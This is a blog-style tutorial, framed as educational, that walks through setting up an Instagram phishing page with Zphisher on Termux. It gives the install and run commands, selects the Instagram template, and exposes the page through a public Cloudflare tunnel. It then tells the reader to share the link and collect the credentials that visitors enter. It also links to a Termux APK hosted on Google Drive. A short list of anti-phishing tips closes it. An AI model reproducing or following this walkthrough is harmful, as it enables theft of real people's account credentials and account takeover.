Instagram has become one of the most popular social media platforms, with millions of users sharing photos, videos, and stories every day. But with its growing popularity, it has also become a target for hackers. In this practical guide, we’ll walk you through the step-by-step process of demonstrating a phishing attack using Termux and Zphisher, tools designed for ethical hacking and cybersecurity awareness.
⚠️ Disclaimer:
This guide is strictly for educational purposes only. The techniques demonstrated here aim to raise awareness and teach users how to recognize and protect themselves from phishing attacks. Unauthorized hacking or malicious activity is illegal
DEATAILED PARTICAL VIDEO
Step 1: Installing Termux and Updating Packages
- Download and Install Termux APK from Google Drive 👉 https://drive.google.com/file/d/12b4ff5JxBWhKZJqLC5XbTWBrChg5ejbf/view?usp=drivesdk
- Open Termux and run the following commands to update and upgrade the packages:
pkg update
pkg upgrade Step 2: Installing Git and Cloning the Phishing Tool
- Install Git using the following command:
pkg install git
git clone https://github.com/htr-tech/zphisher.git
cd zphisher
- Change the script permissions and run it:
chmod +x zphisher.sh
bash zphisher.sh
Step 3: Choosing the Instagram Phishing Template
You will now see the Zphisher menu with phishing page templates.
- Since we are targeting Instagram, select option 2 This will set up the Instagram phishing page.
2
Step 4: Running Zphisher Locally on Localhost
Zphisher will now ask you to select a server to host the phishing page.
- Choose Localhost option 1 by selecting the corresponding option.
- Zphisher will start a local server and display a localhost link like this.This link will work only on your local network. To make it accessible globally, we will now set up port forwarding using Cloudflare. AS shown in the figure
it will show like this
http://127.0.0.1:8080Step 5: Port Forwarding with Cloudflare
- Create a Tunnel for Localhost:
Once Zphisher is running on localhost, open a new Termux session (swipe left/right or useCtrl + Cshortcut). Run the following command to forward localhost traffic to the Cloudflare tunnel:
- Install Cloudflare Tool in Termux:
pkg install cloudflaredcloudflared tunnel --url http://127.0.0.1:8080- Get the Phishing Link:
Cloudflare will now provide a URL that looks something like this
https://phishsite.cloudflare-tunnel.com - This is the phishing link you can use to simulate how phishing attacks work.
Step 6: Testing the Phishing Link
Share the Cloudflare phishing link generated in Step 5 (for testing purposes only) and check the credentials captured when someone visits the fake Instagram login page.
- When a user enters their credentials, Zphisher will capture them and display the information in Termux:
Step 7: Staying Safe from Phishing Attacks
It’s crucial to learn how to identify and avoid phishing attacks. Here are some important security tips:
Regularly update your software and apps to patch vulnerabilities.
Always check the URL before entering login credentials. Phishing URLs often look similar to real websites but may have extra characters or unusual domains.
Enable Two-Factor Authentication (2FA) to add an extra layer of security to your accounts.
Be cautious about links sent via email, text, or social media.
Use a Password Manager to create and store strong, unique passwords.
